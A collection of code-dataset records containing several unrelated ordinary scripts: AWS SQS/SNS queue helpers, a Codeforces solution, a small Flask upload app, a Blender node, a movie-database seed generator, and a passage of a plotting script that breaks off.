##############\ndef readAndDeleteMessageSISM(name, productInstanceId):\n status, sqs_queue = getQueueAttributes(name)\n #logger.console('################ line # 110 #########################')\n message_count = sqs_queue['Attributes']['ApproximateNumberOfMessages']\n #logger.info('################ line # 112 #########################')\n logger.console(\"message count is\" + str(message_count))\n logger.info(\"message count is\" + str(message_count))\n sqs_client = boto3.client('sqs', region_name='us-west-2')\n logger.console('Reading and deleting from queue ' + name)\n sqs_url = sqs_client.get_queue_url(QueueName=name)['QueueUrl']\n #logger.console('################ line # 118 #########################')\n response = sqs_client.receive_message(QueueUrl=sqs_url, AttributeNames=['All'], MaxNumberOfMessages=10,\n WaitTimeSeconds=20)\n #logger.info('################ line # 121 #########################')\n # logger.console('Response of Reading and deleting from queue ' + str(response))\n # logger.console('productInstanceId is' + str(productInstanceId))\n try:\n all_messages = response['Messages']\n #logger.info('################ line # 125 #########################')\n except KeyError:\n #logger.info('################ line # 127 #########################')\n logger.info('No messages on the queue!')\n all_messages = []\n return True, \"No more messages in the queue\", all_messages\n\n for message in all_messages:\n MessageId = message['MessageId']\n logger.info('MessageId is:')\n logger.info(MessageId)\n logger.info(message)\n body = message['Body']\n data = json.loads(body)\n # logger.console('data is:')\n # logger.console(data)\n #logger.console('################ line # 140 #########################')\n eventRaw = data['Message']\n #logger.console('################ line # 213 #########################')\n event = json.loads(eventRaw)\n #logger.console('################ line # 215 #########################')\n # logger.console('event is:')\n # logger.console(event)\n try:\n eventPID = event['eventData']['productInstanceId']\n #logger.console('################ line # 219 #########################')\n except:\n logger.console('Message body is null and does not have eventData')\n logger.console(message)\n #logger.console('################ line # 223 #########################')\n sqs_client.delete_message(QueueUrl=sqs_url, ReceiptHandle=message['ReceiptHandle'])\n continue\n\n # logger.console('################ line # 86 #########################')\n logger.console('########## productInstanceId from event is###################### ')\n logger.console(eventPID)\n #logger.console('################ line # 148 #########################')\n if eventPID == productInstanceId:\n logger.info('found a match of eventfor given product instance id')\n logger.info(event)\n stateType = event['eventHeader']['newState']['stateType']\n sqs_client.delete_message(QueueUrl=sqs_url, ReceiptHandle=message['ReceiptHandle'])\n return True, stateType, event\n else:\n #logger.console('################ line # 156 #########################')\n sqs_client.delete_message(QueueUrl=sqs_url, ReceiptHandle=message['ReceiptHandle'])\n\n #logger.console('################ line # 159 #########################')\n logger.info('did not find a match for product instance id in PSM SNS' + str(productInstanceId))\n return False, False, all_messages\n\n'''\ndef readAndDeleteMessageSISM(name, productInstanceId):\n stateType = None\n sqs_client = boto3.client('sqs', region_name='us-west-2')\n logger.console('Reading and deleting from queue ' + name)\n sqs_url = sqs_client.get_queue_url(QueueName=name)['QueueUrl']\n response = sqs_client.receive_message(QueueUrl=sqs_url, AttributeNames=['All'], MaxNumberOfMessages=10,\n WaitTimeSeconds=20)\n # logger.console('Response of Reading and deleting from queue ' + str(response))\n # logger.console('productInstanceId is' + str(productInstanceId))\n for message in response['Messages']:\n # logger.console('################ line # 73 #########################')\n MessageId = message['MessageId']\n logger.console('MessageId is:')\n logger.console(MessageId)\n body = message['Body']\n data = json.loads(body)\n # logger.console('data is:')\n # logger.console(data)\n eventRaw = data['Message']\n event = json.loads(eventRaw)\n # logger.console('event is:')\n # logger.console(event)\n eventPID = event['eventData']['productInstanceId']\n # logger.console('################ line # 86 #########################')\n # logger.console('########## productInstanceId from event is###################### ' + str(eventPID))\n if eventPID == productInstanceId:\n logger.info('found a match of eventfor given product instance id')\n logger.info(event)\n stateType = event['eventHeader']['newState']['stateType']\n sqs_client.delete_message(QueueUrl=sqs_url, ReceiptHandle=message['ReceiptHandle'])\n return True, stateType, event\n\n logger.info('did not find a match for product instance id in SSIM SNS' + str(productInstanceId))\n return False, None, None\n'''\n\n############## OM Queue Functions ##############\ndef readAndDeleteMessageOMWithState(name, orderId, expectedEndState):\n status, sqs_queue = getQueueAttributes(name)\n # logger.console('################ line # 110 #########################')\n message_count = sqs_queue['Attributes']['ApproximateNumberOfMessages']\n # logger.console('################ line # 112 #########################')\n logger.console(\"message count is\" + str(message_count))\n logger.info(\"message count is\" + str(message_count))\n sqs_client = boto3.client('sqs', region_name='us-west-2')\n logger.console('Reading and deleting from queue ' + name)\n sqs_url = sqs_client.get_queue_url(QueueName=name)['QueueUrl']\n # logger.console('################ line # 118 #########################')\n response = sqs_client.receive_message(QueueUrl=sqs_url, AttributeNames=['All'], MaxNumberOfMessages=10,\n WaitTimeSeconds=20)\n # logger.console('################ line # 121 #########################')\n # logger.console('Response of Reading and deleting from queue ' + str(response))\n # logger.console('productInstanceId is' + str(productInstanceId))\n try:\n all_messages = response['Messages']\n # logger.console('################ line # 125 #########################')\n except KeyError:\n # logger.console('################ line # 127 #########################')\n logger.info('No messages on the queue!')\n all_messages = []\n return True, True, \"No more messages in the queue\", all_messages\n\n for message in all_messages:\n # logger.console('################ line # 73 #########################')\n MessageId = message['MessageId']\n logger.console('MessageId is:')\n logger.console(MessageId)\n body = message['Body']\n data = json.loads(body)\n # logger.console('data is:')\n # logger.console(data)\n eventRaw = data['Message']\n logger.info('eventRaw is:')\n logger.info(eventRaw)\n logger.info(\"type of eventRaw is\")\n logger.info(type(eventRaw))\n event = json.loads(eventRaw)\n logger.info('event is:')\n logger.info(event)\n logger.info(\"type of event is\")\n logger.info(type(event))\n eventOrderId = event['eventData']['orderId']\n # logger.console('################ line # 86 #########################')\n # logger.console('########## productInstanceId from event is###################### ' + str(eventPID))\n if eventOrderId == orderId:\n endState = event['eventData']['newState']\n startState = event['eventData']['oldState']\n if endState == expectedEndState:\n logger.console('found a match of eventfor given order id')\n logger.info(event)\n sqs_client.delete_message(QueueUrl=sqs_url, ReceiptHandle=message['ReceiptHandle'])\n return True, startState, endState, event\n else:\n # logger.console('################ line # 156 #########################')\n sqs_client.delete_message(QueueUrl=sqs_url, ReceiptHandle=message['ReceiptHandle'])\n\n # logger.console('################ line # 159 #########################')\n logger.info('did not find a match for product instance id in PSM SNS' + str(orderId))\n return False, False, False, all_messages\n\n'''\ndef readAndDeleteMessageOM(name, orderId):\n status, sqs_queue = getQueueAttributes(name)\n #logger.console('################ line # 110 #########################')\n message_count = sqs_queue['Attributes']['ApproximateNumberOfMessages']\n #logger.console('################ line # 112 #########################')\n logger.console(\"message count is\" + str(message_count))\n logger.info(\"message count is\" + str(message_count))\n sqs_client = boto3.client('sqs', region_name='us-west-2')\n logger.console('Reading and deleting from queue ' + name)\n sqs_url = sqs_client.get_queue_url(QueueName=name)['QueueUrl']\n #logger.console('################ line # 118 #########################')\n response = sqs_client.receive_message(QueueUrl=sqs_url, AttributeNames=['All'], MaxNumberOfMessages=10,\n WaitTimeSeconds=20)\n #logger.console('################ line # 121 #########################')\n # logger.console('Response of Reading and deleting from queue ' + str(response))\n # logger.console('productInstanceId is' + str(productInstanceId))\n try:\n all_messages = response['Messages']\n #logger.console('################ line # 125 #########################')\n except KeyError:\n #logger.console('################ line # 127 #########################')\n logger.info('No messages on the queue!')\n all_messages = []\n return True, True, \"No more messages in the queue\", all_messages\n\n for message in all_messages:\n # logger.console('################ line # 73 #########################')\n MessageId = message['MessageId']\n logger.console('MessageId is:')\n logger.console(MessageId)\n body = message['Body']\n data = json.loads(body)\n # logger.console('data is:')\n # logger.console(data)\n eventRaw = data['Message']\n event = json.loads(eventRaw)\n #logger.info('event is:')\n #logger.info(event)\n eventOrderId = event['eventData']['orderId']\n # logger.console('################ line # 86 #########################')\n # logger.console('########## productInstanceId from event is###################### ' + str(eventPID))\n if eventOrderId == orderId:\n logger.console('found a match of eventfor given order id')\n logger.info(event)\n startState = event['eventData']['startState']\n endState = event['eventData']['endState']\n sqs_client.delete_message(QueueUrl=sqs_url, ReceiptHandle=message['ReceiptHandle'])\n return True, startState, endState, event\n else:\n #logger.console('################ line # 156 #########################')\n sqs_client.delete_message(QueueUrl=sqs_url, ReceiptHandle=message['ReceiptHandle'])\n\n #logger.console('################ line # 159 #########################')\n logger.info('did not find a match for product instance id in PSM SNS' + str(orderId))\n return False, False, False, all_messages\n'''\n'''\ndef readAndDeleteMessageOM(name, orderId):\n sqs_client = boto3.client('sqs', region_name='us-west-2')\n logger.console('Reading and deleting from queue ' + name)\n sqs_url = sqs_client.get_queue_url(QueueName=name)['QueueUrl']\n response = sqs_client.receive_message(QueueUrl=sqs_url, AttributeNames=['All'], MaxNumberOfMessages=10,\n WaitTimeSeconds=20)\n logger.info('Response of Reading and deleting from queue ' + str(response))\n\n for message in response['Messages']:\n # logger.console('################ line # 73 #########################')\n MessageId = message['MessageId']\n logger.console('MessageId is:')\n logger.console(MessageId)\n body = message['Body']\n data = json.loads(body)\n # logger.console('data is:')\n # logger.console(data)\n eventRaw = data['Message']\n event = json.loads(eventRaw)\n # logger.console('event is:')\n # logger.console(event)\n eventOrderId = event['orderId']\n # logger.console('################ line # 86 #########################')\n # logger.console('########## productInstanceId from event is###################### ' + str(eventPID))\n if eventOrderId == orderId:\n logger.console('found a match of eventfor given order id')\n logger.info(event)\n startState = event['startState']\n endState = event['endState']\n sqs_client.delete_message(QueueUrl=sqs_url, ReceiptHandle=message['ReceiptHandle'])\n return True, startState, endState, event\n\n logger.info('did not find a match for order id in OM SNS' + str(orderId))\n\n return False, None, None, None\n\n'''\n\n##### Topic Functions ############\ndef list_topics(params={}):\n sns_client = boto3.client('sns', region_name='us-west-2')\n response = sns_client.list_topics()\n logger.console('Response of listing topics ' + str(response))\n return response\n\n\n\n\n######### Policies ################\n# allow queue to receive from all topics or just the one specified\ndef sqsCreateSnsPolicies(queue_arn,topic_arn=False):\n # don't think Sid matters\n sqs_policy = \\\n { \\\n \"Version\": \"2012-10-17\", \\\n \"Id\": queue_arn+\"/SQSDefaultPolicy\", \\\n \"Statement\": [ \\\n { \\\n \"Sid\": \"Sid1538418341381\", \\\n \"Effect\": \"Allow\", \\\n \"Principal\": { \\\n \"AWS\": \"*\" \\\n }, \\\n \"Action\": \"SQS:SendMessage\", \\\n \"Resource\": queue_arn \\\n } \\\n ] \\\n }\n if topic_arn != False:\n sqs_policy['Statement'][0]['Condition'] = {\"ArnEquals\":{\"aws:SourceArn\":topic_arn}}\n return sqs_policy\n\n\ndef addSnsReadPolicy(name, topic_arn):\n try:\n sqs_client = boto3.client('sqs', region_name='us-west-2')\n sqs_url = sqs_client.get_queue_url(QueueName=name)['QueueUrl']\n queue_attributes = sqs_client.get_queue_attributes(QueueUrl=sqs_url, AttributeNames=['QueueArn'])\n sqs_policy = sqsCreateSnsPolicies(queue_attributes['Attributes']['QueueArn'], topic_arn)\n policy_response = sqs_client.set_queue_attributes(QueueUrl=sqs_url,\n Attributes={'Policy': json.dumps(sqs_policy)})\n logger.console('Response of read policy ' + str(policy_response))\n return True, policy_response\n except Exception as e:\n logger.console('Exception while adding sns read policy' + str(e))\n return False, None\n\n\n'''\nif __name__ == '__main__':\n #name = \"beptest_\" + str(random.randint(1, 999999))\n # name = \"beptest_508933\"\n #topic_arn = \"arn:aws:sns:us-west-2:785409038667:pgadekar_test\"\n #topic_arn = \"arn:aws:sns:us-west-2:156734773799:psm-events-dev\"\n #name = \"bepe2e-test\"\n name = \"test\"\n topic_arn = \"arn:aws:sns:us-west-2:972022464428:rsism-events-dev\"\n #createQueue(name)\n\n\n\n #list_topics()\n\n sqs_queue = getQueueAttributes(name)\n #add_sns_read_policy(name, topic_arn)\n\n subscribeSqsQueueToTopic(sqs_queue, topic_arn)\n\n #read(name)\n readAndDeleteMessageSISM(name)\n\n #deleteQueue(name)\n'''\n","sub_path":"common/bep/common/aws/sqs.py","file_name":"sqs.py","file_ext":"py","file_size_in_byte":37711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"504450970","text":"from math import sqrt\nn = int(input())\n\ns = 0\n\nfor i in range(1,int(sqrt(n))+1):\n if n%i==0:\n s += 2\n if i == n/i:\n s -= 1\n if i==1:\n s-=1\nprint(s)","sub_path":"codeforces/random/935a.py","file_name":"935a.py","file_ext":"py","file_size_in_byte":177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"30689354","text":"import os\nimport socket\nimport time\n#from redis import Redis, RedisError\nfrom flask import Flask, render_template, request, redirect, url_for, flash\nfrom werkzeug.utils import secure_filename\n\nimport gisPlot \nimport model\n\nUPLOAD_FOLDER = './upload'\nALLOWED_EXTENSIONS = set(['txt', 'pws'])\n\n# Connect to Redis\n#redis = Redis(host=\"redis\", db=0, socket_connect_timeout=2, socket_timeout=2)\n\napp = Flask(__name__)\napp.secret_key = 'some_secret'\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n\ndef allowed_file(filename):\n return '.' in filename and \\\n filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n\ndef uploadFile():\n status = None\n \n if not os.path.isdir('upload'):\n os.mkdir('upload')\n\n # check if the post request has the file part\n if 'file' not in request.files:\n flash('No file part')\n return redirect(url_for('index'))\n file = request.files['file']\n # if user does not select file, browser also\n # submit a empty part without filename\n if file.filename == '':\n flash('No selected file')\n return redirect(url_for('index'))\n if file and not allowed_file(file.filename):\n flash('Not txt or pws file')\n return redirect(url_for('index'))\n if file and allowed_file(file.filename):\n filename = secure_filename(file.filename)\n file.save(os.path.join(app.config['UPLOAD_FOLDER'], 'input.pws'))\n status = 'File %s successfully uploaded.' % file.filename\n return status\n\n@app.route('/result/')\ndef result():\n gpl = gisPlot.gPlot()\n start_time = time.time()\n plotList = gpl.plotPWS(1)\n dictL = gpl.getFeatures()\n bmList,dRP = gpl.plotBrainMap()\n lrbList,pwS, LR1, LR2, LR3 = gpl.plotLR()\n rtime = (time.time() - start_time)\n\n return render_template('result.html', plotList=plotList,\\\n dictList=dictL, bmList=bmList, dictRelPow=dRP, lrbList=lrbList, powSpecList=pwS, LR1List=LR1, LR2List=LR2,LR3=LR3, rtime=rtime) \n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n if request.method == 'POST':\n status = uploadFile()\n #mFile = model.gFile(app, request.files)\n #status = mFile.upload()\n else:\n status=None\n\n return render_template('form.html', status=status)\n\nif __name__ == \"__main__\":\n app.run(debug=True, host='0.0.0.0', port=80, threaded=True)","sub_path":"dockerLivingLab/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"175111410","text":"import bpy, random\nfrom bpy.types import Node\nfrom mn_node_base import AnimationNode\nfrom mn_execution import nodePropertyChanged\n\nclass RandomNumberNode(Node, AnimationNode):\n\tbl_idname = \"RandomNumberNode\"\n\tbl_label = \"Random Number\"\n\t\n\tdef init(self, context):\n\t\tself.inputs.new(\"IntegerSocket\", \"Seed\")\n\t\tself.inputs.new(\"FloatSocket\", \"Min\").number = 0.0\n\t\tself.inputs.new(\"FloatSocket\", \"Max\").number = 1.0\n\t\tself.outputs.new(\"FloatSocket\", \"Float Value\")\n\t\tself.outputs.new(\"IntegerSocket\", \"Integer Value\")\n\t\t\n\tdef execute(self, input):\n\t\toutput = {}\n\t\tseed = input[\"Seed\"]\n\t\tmin = input[\"Min\"]\n\t\tmax = input[\"Max\"]\n\t\trandom.seed(seed)\n\t\toutput[\"Float Value\"] = random.uniform(min, max)\n\t\toutput[\"Integer Value\"] = int(output[\"Float Value\"])\n\t\treturn output\n\t\t\n# register\n################################\n\t\t\ndef register():\n\tbpy.utils.register_module(__name__)\n\ndef unregister():\n\tbpy.utils.unregister_module(__name__)","sub_path":"nodes/input/mn_random_number.py","file_name":"mn_random_number.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"128506043","text":"import json\nimport uuid\nimport names\nimport random\nimport time\nfrom tqdm import tqdm\nimport PrepareSerieData\n\n# https://github.com/FEND16/movie-json-data\n\nwith open(\"moviedata.json\", \"r\") as f:\n\tdata = json.load(f)\n\ntemplate1 = \"\"\"\nINSERT INTO VIDEO_ITEM (ID,TITLE,YEAR,IMAGE_SRC,VIDEO_SRC,IMDB_RATING)\nVALUES ('#id#', '#title#', '#year#', '#img#', 'TearsOfSteel.mp4', 10);\n\nINSERT INTO VIDEO_DESCRIPTION (ID,DESCRIPTION)\nVALUES ('#id#', '#description#');\n\"\"\"\n\ntemplate2 = \"\"\"\nINSERT INTO USER_INFO (ID,USER_NAME)\nVALUES ('#id#', '#username#');\n\"\"\"\n\ntemplate3 = \"\"\"\nINSERT INTO META_DATA (ID,MOVIE_ID,USER_ID,PERCENTAGE_WATCHED,RATING)\nVALUES ('#id#','#mid#','#uid#','#pw#','#r#');\n\"\"\"\n\ntemplate4 = \"\"\"\nINSERT INTO VIDEO_COMMENT (ID,COMMENT_TEXT,LIKES,USER_INFO_ID,TIMESTAMP,VIDEO_ID)\nVALUES ('#COMMENT_ID#','#COMMENT_TEXT#','#LIKES#','#COMMENT_USER#','#TIMESTAMP#','#VIDEO_ID#');\n\"\"\"\n\ntemplate5 = \"\"\"\nINSERT INTO VIDEO_GENRE (ID,GENRE_NAME)\nVALUES ('#GENRE_ID#','#GENRE_NAME#');\n\"\"\"\n\ntemplate6 = \"\"\"\nINSERT INTO VIDEO_ITEM_GENRES (VIDEOS_ID,GENRES_ID)\nVALUES ('#VIDEOS_ID#','#GENRES_ID#');\n\n\"\"\"\n\nmovie_ids = []\nmovie_genres = {}\nuser_ids = []\nuser_names = []\nmovie_meta = []\ngenres = []\ngenre_ids = []\n\nprint(\"\\nPreparing movies...\")\n\nwith open(\"movies.sql\", \"w\") as f:\n\tfor movie in tqdm(data):\n\t\tmovie_id = str(uuid.uuid4())\n\t\tmovie_ids.append(movie_id)\n\t\ttitle = movie['originalTitle'] if movie['originalTitle'] != \"\" else movie['title']\n\t\ttitle = title.replace(\"'\", \"''\")\n\t\tyear = movie['year']\n\t\timg = movie['poster']\n\t\tdesc = movie['storyline'].replace(\"\\n\", \" \").replace(\"'\", \"''\")\n\t\tdesc += \" tags: \"\n\t\tfor genre in movie['genres']:\n\t\t\tdesc += genre.replace(\"'\", \"''\") + \" \"\n\t\tfor actor in movie['actors']:\n\t\t\tdesc += actor.replace(\"'\", \"''\") + \" \"\n\n\t\tinsert = template1.replace('#id#', movie_id)\n\t\tinsert = insert.replace('#title#', title)\n\t\tinsert = insert.replace('#year#', year)\n\t\tinsert = insert.replace('#img#', img)\n\t\tinsert = insert.replace('#description#', desc)\n\n\t\tf.write(insert)\n\t\tmovie_genres[movie_id] = movie['genres']\n\t\tmovie_meta.append([movie_id, movie['year'], movie['genres'], movie['actors'], movie['ratings'], movie['contentRating'], movie['duration'], movie['imdbRating']])\n\ntime.sleep(2)\nprint(\"\\nPreparing movie metadata...\")\n\nwith open(\"movie_meta.csv\", \"a\") as f:\n\tf.write(\"movieId;year;genres[,];actors[,];contentRating;duration;imdbRating\\n\")\n\n\tfor item in tqdm(movie_meta):\n\t\tfor genre in item[2]:\n\t\t\tif genre not in genres:\n\t\t\t\tgenres.append(genre)\n\t\t\t\tgenre_ids.append(str(uuid.uuid4()))\n\t\tf.write(\"%s;\" % item[0])\n\t\tf.write(\"%s;\" % item[1])\n\t\tf.write(\"%s;\" % ','.join(item[2]))\n\t\tf.write(\"%s;\" % ','.join(item[3]))\n\t\tf.write(\"%s;\" % item[5])\n\t\tf.write(\"%s;\" % item[6])\n\t\tf.write(\"%s\\n\" % item[7])\n\ntime.sleep(2)\nprint(\"\\nPreparing users...\")\n\nwith open(\"movies.sql\", \"a\") as f:\n\tfor x in tqdm(range(10000)):\n\t\tuser_id = str(uuid.uuid4())\n\t\tname = names.get_full_name().replace(\" \", \"\")\n\n\t\tif name in user_names:\n\t\t\tcontinue\n\t\tuser_names.append(name)\n\t\tuser_ids.append(user_id)\n\t\tinsert = template2.replace('#id#', user_id)\n\t\tinsert = insert.replace('#username#', name)\n\t\tf.write(insert)\n\ntime.sleep(2)\nprint(\"\\nPreparing user meta...\")\n\npws = []\npws.extend(range(1, 20))\npws.extend(range(80, 101))\nhigh = [8, 9, 10]\nmid = [4, 5, 6, 7]\nlow = [1, 2, 3]\n\nind = len(genres)\npicks = []\npbar = tqdm(total=100000)\n\nwith open(\"user_meta.csv\", \"w\") as o:\n\to.write(\"id;userId;movieId;rating\\n\")\n\twith open(\"metadata.sql\", \"w\") as f:\n\t\twhile len(picks) < 100000:\n\t\t\tmeta_id = str(uuid.uuid4())\n\t\t\tuser_id = random.choice(user_ids)\n\t\t\tmovie_id = random.choice(movie_ids)\n\t\t\tkey = user_id + movie_id\n\t\t\tif key not in picks:\n\t\t\t\tpicks.append(key)\n\t\t\telse:\n\t\t\t\tcontinue\n\n\t\t\tpw = random.choice(pws)\n\t\t\tindex = user_ids.index(user_id) % ind\n\t\t\tmg = movie_genres[movie_id]\n\t\t\tgood = genres[index]\n\t\t\tbad = genres[-(index+1)]\n\n\t\t\tif good in mg and bad not in mg:\n\t\t\t\trating = random.choice(high)\n\t\t\telif bad in mg and good not in mg:\n\t\t\t\trating = random.choice(mid)\n\t\t\telse:\n\t\t\t\trating = random.choice(low)\n\n\t\t\tinsert = template3.replace(\"#id#\", meta_id)\n\t\t\tinsert = insert.replace(\"#uid#\", user_id)\n\t\t\tinsert = insert.replace(\"#mid#\", movie_id)\n\t\t\tinsert = insert.replace(\"#pw#\", str(pw))\n\t\t\tinsert = insert.replace(\"#r#\", str(rating))\n\t\t\tf.write(insert)\n\t\t\to.write(\"%s;%s;%s;%s\\n\" % (id, user_id, movie_id, rating))\n\t\t\tpbar.update(1)\n\ntime.sleep(2)\nprint(\"\\nPreparing genres...\")\n\nwith open(\"movies.sql\", \"a\") as f:\n\tfor genre in tqdm(genres):\n\t\tindex = genres.index(genre)\n\t\tgenre_id = genre_ids[index]\n\t\tinsert = template5.replace(\"#GENRE_ID#\", genre_id)\n\t\tinsert = insert.replace(\"#GENRE_NAME#\", genre)\n\t\tf.write(insert)\n\nwith open(\"movies.sql\", \"a\") as m:\n\tfor movie in tqdm(movie_ids):\n\t\tmovie_id = movie\n\t\tfor genre in movie_genres[movie_id]:\n\t\t\tfor gen in genres:\n\t\t\t\tif gen == genre:\n\t\t\t\t\tindex = genres.index(genre)\n\t\t\t\t\tgenre_id = genre_ids[index]\n\t\t\t\t\tinsert = template6.replace(\"#VIDEOS_ID#\", movie_id)\n\t\t\t\t\tinsert = insert.replace(\"#GENRES_ID#\", genre_id)\n\t\t\t\t\tm.write(insert)\n\ntime.sleep(2)\nprint(\"\\nPreparing video comments...\")\n\ncomment_first = [\"Ik vond de film \", \"De film was \", \"Het is \"]\ncomment_last = [\"leuk\", \"slecht\", \"verrassend\", \"nieuw\"]\n\nwith open(\"movies.sql\", \"a\") as f:\n\tfor x in tqdm(range(10000)):\n\t\tfirst_id = random.randint(0, len(comment_first)-1)\n\t\tlast_id = random.randint(0, len(comment_last)-1)\n\t\tcomment = comment_first[first_id] + comment_last[last_id]\n\t\ttimestamp = \"\"\n\n\t\tinsert = template4.replace(\"#COMMENT_ID#\", str(uuid.uuid4()))\n\t\tinsert = insert.replace(\"#COMMENT_TEXT#\", comment)\n\t\tinsert = insert.replace(\"#COMMENT_USER#\", user_ids[random.randint(0, len(user_ids) - 1)])\n\t\tinsert = insert.replace(\"#TIMESTAMP#\", str(random.randint(2000, 2020)) + \"-\" + str(random.randint(1, 13)) + \"-\" + str(random.randint(1, 30)))\n\t\tinsert = insert.replace(\"#LIKES#\", str(random.randint(0, 11)))\n\t\tinsert = insert.replace(\"#VIDEO_ID#\", movie_ids[random.randint(0, len(movie_ids) - 1)])\n\t\tf.write(insert)\n\n\ntime.sleep(2)\nprint(\"\\nAll movie data prepared.\")\ntime.sleep(1)\nprint(\"Fetching serie data...\")\n\n\nprint(\"Preparing serie data...\")\nserieTemplate = \"\"\"\nINSERT INTO VIDEO_SERIE (ID,DESCRIPTION,IMAGE_SRC,IMDBID,TITLE,YEAR)\nVALUES ('#id#', '#description#', '#imagesrc#', '#imdb#', '#title#', '#year#');\n\"\"\"\n\nseasonTemplate = \"\"\"\nINSERT INTO VIDEO_SEASON (ID,SEASON_NUM,SERIE_ID)\nVALUES ('#id#', '#seasonnum#', '#serieid#');\n\"\"\"\n\nvideoItemTemplate = \"\"\"\nINSERT INTO VIDEO_ITEM (ID,TITLE,YEAR,IMAGE_SRC,VIDEO_SRC,TYPE,IMDB_RATING)\nVALUES ('#id#', '#title#', '#year#', '#img#', 'TearsOfSteel.mp4', 'SERIE', '#imdbrating#');\n\nINSERT INTO VIDEO_DESCRIPTION (ID,DESCRIPTION)\nVALUES ('#id#', '#description#');\n\"\"\"\n\nepisodeTemplate = \"\"\"\nINSERT INTO VIDEO_EPISODE (ID,SEASON_ID,VIDEO_ID)\nVALUES ('#id#', '#season#', '#video_id#');\n\"\"\"\n\n\nserieGenreTemplate = \"\"\"\nINSERT INTO VIDEO_SERIE_VIDEO_GENRES (SERIES_ID,VIDEO_GENRES_ID)\nVALUES ('#serieID#', '#genreID#');\n\"\"\"\n\nfinalSeries = PrepareSerieData.fetchSerieData()\n\nwith open(\"series.sql\", \"a\") as s:\n\tfor serie in tqdm(finalSeries):\n\t\tserieInsert = serieTemplate.replace(\"#id#\", serie.id)\n\t\tserieInsert = serieInsert.replace(\"#description#\", serie.description)\n\t\tserieInsert = serieInsert.replace(\"#imagesrc#\", serie.serieIMG)\n\t\tserieInsert = serieInsert.replace(\"#imdb#\", str(int(float(serie.imdbRating))))\n\t\tserieInsert = serieInsert.replace(\"#title#\", serie.title)\n\t\tserieInsert = serieInsert.replace(\"#year#\", serie.year)\n\t\ts.write(serieInsert)\n\n\t\tfor genre in serie.genres:\n\t\t\tfor gen in genres:\n\t\t\t\tif gen == genre:\n\t\t\t\t\tindex = genres.index(genre)\n\t\t\t\t\tgenre_id = genre_ids[index]\n\t\t\t\t\tserieGenreInsert = serieGenreTemplate.replace(\"#serieID#\", serie.id)\n\t\t\t\t\tserieGenreInsert = serieGenreInsert.replace(\"#genreID#\", genre_id)\n\t\t\t\t\ts.write(serieGenreInsert)\n\n\n\t\tfor season in serie.seasons:\n\t\t\tseasonInsert = seasonTemplate.replace(\"#id#\", season.id)\n\t\t\tseasonInsert = seasonInsert.replace(\"#seasonnum#\", str(season.seasonNum))\n\t\t\tseasonInsert = seasonInsert.replace(\"#serieid#\", serie.id)\n\t\t\ts.write(seasonInsert)\n\n\t\t\tfor episode in season.episodes:\n\t\t\t\tvideoItemID = str(uuid.uuid4())\n\t\t\t\tvideoItemInsert = videoItemTemplate.replace(\"#id#\", videoItemID)\n\t\t\t\tvideoItemInsert = videoItemInsert.replace(\"#title#\", episode.title)\n\t\t\t\tvideoItemInsert = videoItemInsert.replace(\"#year#\", str(serie.year))\n\t\t\t\tvideoItemInsert = videoItemInsert.replace(\"#img#\", episode.imagesrc)\n\t\t\t\tvideoItemInsert = videoItemInsert.replace(\"#imdbrating#\", str(int(float(serie.imdbRating))))\n\t\t\t\tif episode.description == None:\n\t\t\t\t\tvideoItemInsert = videoItemInsert.replace(\"#description#\", \"No description\")\n\t\t\t\telse:\n\t\t\t\t\tepisode.description = episode.description.replace('\"', '')\n\t\t\t\t\tepisode.description = episode.description.replace(\"'\", \"\")\n\t\t\t\t\tvideoItemInsert = videoItemInsert.replace(\"#description#\", episode.description)\n\t\t\t\ts.write(videoItemInsert)\n\n\t\t\t\tepisodeInsert = episodeTemplate.replace(\"#id#\", episode.id)\n\t\t\t\tepisodeInsert = episodeInsert.replace(\"#season#\", season.id)\n\t\t\t\tepisodeInsert = episodeInsert.replace(\"#video_id#\", videoItemID)\n\t\t\t\ts.write(episodeInsert)\nprint(\"DONE!!!\")","sub_path":"src/main/resources/python/PrepareMovieData.py","file_name":"PrepareMovieData.py","file_ext":"py","file_size_in_byte":9097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"567124999","text":"import matplotlib.pyplot as plt\nimport pandas as pd\nimport os\nimport re\nimport numpy as np\n\nfolder = []\nfor i in os.walk('C:/Users/makov/Desktop/Kinetics(May 2019)/Temp'):\n folder.append(i)\n\nprint('Folder', folder[0][1])\n\nmax_values_RT = []\nmax_values_320 = []\nmax_values_340 = []\nmax_values_RT_2 = []\nmax_values_320_2= []\nmax_values_340_2 = []\nCounter_RT = 0\nCounter_320 = 0\nCounter_340 = 0\nprevious = ''\n\nfor i in folder[0][1]:\n level_1 = os.listdir(''.join(folder[0][0] + '/' + i))\n # print(level_1[1].split('-'))\n level_1.sort(key=lambda x: int(re.search(r'\\d+', x.split('-')[0]).group()))\n print('Level 1', level_1)\n previous = level_1[0]\n for j in level_1:\n data = pd.read_csv(''.join(folder[0][0] + '/' + i + '/' + j))\n if 'RT' in j:\n # if j != level_1[0]:\n # if int(re.search(r'\\d+', previous.split('-')[0]).group()) == int(re.search(r'\\d+', j.split('-')[0]).group()):\n # max_values_RT_2.append(data.iloc[data.idxmax()['filtered'] + 1, 2])\n # else:\n # max_values_RT.append(data.iloc[data.idxmax()['filtered'] + 1, 2])\n # previous = j\n # else:\n max_values_RT.append(1 / data.iloc[data.idxmax()['filtered'] + 1, 2])\n\n if '320' in j:\n # if j != level_1[0]:\n # if int(re.search(r'\\d+', previous.split('-')[0]).group()) == int(re.search(r'\\d+', j.split('-')[0]).group()):\n # max_values_320_2.append(data.iloc[data.idxmax()['filtered'] + 1, 2])\n # else:\n # max_values_320.append(data.iloc[data.idxmax()['filtered'] + 1, 2])\n # previous = j\n # else:\n max_values_320.append(1 / data.iloc[data.idxmax()['filtered'] + 1, 2])\n\n if '340' in j:\n # if j != level_1[0]:\n # if int(re.search(r'\\d+', previous.split('-')[0]).group()) == int(re.search(r'\\d+', 